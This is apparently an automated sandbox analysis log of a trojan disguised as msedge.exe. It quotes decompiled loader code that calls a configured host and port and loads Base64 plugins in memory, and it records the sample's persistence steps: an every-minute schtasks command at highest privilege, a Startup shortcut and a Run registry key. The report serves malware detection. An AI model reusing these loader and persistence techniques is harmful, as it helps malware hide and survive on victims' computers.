                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\msedge.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                    Source: msedge.lnk.0.drLNK file: ..\..\..\..\..\..\Local\msedge.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: msedge.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: msedge.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: msedge.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: msedge.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: msedge.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: msedge.exe, Messages.cs.Net Code: Memory
                    Source: msedge.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3454D2A5 pushad ; iretd 2_2_00007FFD3454D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34665F0F push ebx; ret 2_2_00007FFD34665F12
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34732316 push 8B485F94h; iretd 2_2_00007FFD3473231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3453D2A5 pushad ; iretd 5_2_00007FFD3453D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34722316 push 8B485F95h; iretd 5_2_00007FFD3472231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3455D2A5 pushad ; iretd 10_2_00007FFD3455D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34742316 push 8B485F93h; iretd 10_2_00007FFD3474231B
                    Source: C:\Users\user\Desktop\msedge.exeFile created: C:\Users\user\AppData\Local\msedge.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                    Source: C:\Users\user\Desktop\msedge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnkJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnkJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
